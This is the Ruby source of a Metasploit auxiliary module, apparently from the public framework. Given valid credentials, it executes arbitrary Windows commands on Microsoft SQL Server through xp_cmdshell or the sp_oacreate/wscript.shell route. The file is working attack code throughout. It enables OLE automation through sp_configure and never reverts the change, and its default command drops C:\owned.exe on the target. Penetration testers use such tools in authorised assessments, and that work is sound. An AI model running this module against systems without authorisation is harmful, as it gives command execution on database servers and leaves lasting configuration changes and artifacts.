##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
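class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::MSSQL
  include Msf::OptionalSession::MSSQL

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft SQL Server Command Execution',
        'Description' => %q{
          This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell (default) or the
          sp_oacreate procedure (more opsec safe, no output, no temporary data table). A valid username and password is
          required to use this module.
        },
        'Author' => [
          'tebo <tebo[at]attackresearch.com>',
          'arcc <pw[at]evait.de>'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'URL', 'http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx'],
          [ 'URL', 'https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-oacreate-transact-sql'],
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          # The sp_oacreate path turns on 'show advanced options' and 'Ole Automation Procedures' via
          # sp_configure and never turns them back off; the default CMD also drops C:\owned.exe on the target.
          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK],
          'Reliability' => []
        }
      )
    )

    register_options([
      OptString.new('CMD', [ false, 'Command to execute', 'cmd.exe /c echo OWNED > C:\\owned.exe']),
      OptEnum.new('TECHNIQUE', [true, 'Technique to use for command execution', 'xp_cmdshell', ['xp_cmdshell', 'sp_oacreate']])
    ])
  end

  # Authenticate (or reuse an existing MSSQL session) and execute CMD with the selected TECHNIQUE.
  # Prints errors and returns early instead of raising on misconfiguration or login failure.
  def run
    cmd = datastore['CMD']
    # CMD is optional in register_options, so validate it before touching the network: failing here
    # costs nothing on the target, whereas a login attempt already lands in the server's logs.
    if cmd.nil? || cmd.strip.empty?
      print_error('CMD must be set to a non-empty command')
      return
    end

    if session
      set_mssql_session(session.client)
    else
      unless mssql_login_datastore
        print_error('Error with mssql_login call')
        info = mssql_client.initial_connection_info
        Array(info[:errors]).each { |err| print_error(err) }
        return
      end
    end

    case datastore['TECHNIQUE']
    when 'xp_cmdshell'
      begin
        mssql_xpcmdshell(cmd, true)
      rescue RuntimeError
        # The fallback reconfigures the server (see mssql_spoacreate), which is a louder footprint than
        # the operator selected; it is announced here rather than performed silently.
        print_status('Error while running "xp_cmdshell" method...retrying with "sp_oacreate" method')
        mssql_spoacreate
      end
    when 'sp_oacreate'
      mssql_spoacreate
    end
  end

  # Execute CMD through OLE automation (wscript.shell). Produces no output and no temporary table on the
  # target, at the cost of two sp_configure changes that are NOT reverted afterwards.
  def mssql_spoacreate
    doprint = datastore['VERBOSE']
    print_status('Enabling advanced options and ole automation procedures.')
    mssql_query("EXEC sp_configure 'show advanced options', 1; RECONFIGURE;", doprint)
    mssql_query("EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;", doprint)
    print_good('Executing command using sp_oacreate. No output will be displayed.')
    # CMD is spliced into a T-SQL string literal, so double any embedded single quote. Without this a
    # command such as  powershell -c 'Get-Date'  breaks the batch, and the remainder of CMD is parsed
    # as T-SQL instead of being handed to wscript.shell.
    escaped_cmd = datastore['CMD'].to_s.gsub("'", "''")
    mssql_query("DECLARE @mssql INT; EXEC sp_oacreate 'wscript.shell',@mssql OUTPUT; EXEC sp_oamethod @mssql, 'run', null, '#{escaped_cmd}';", doprint)
  end
end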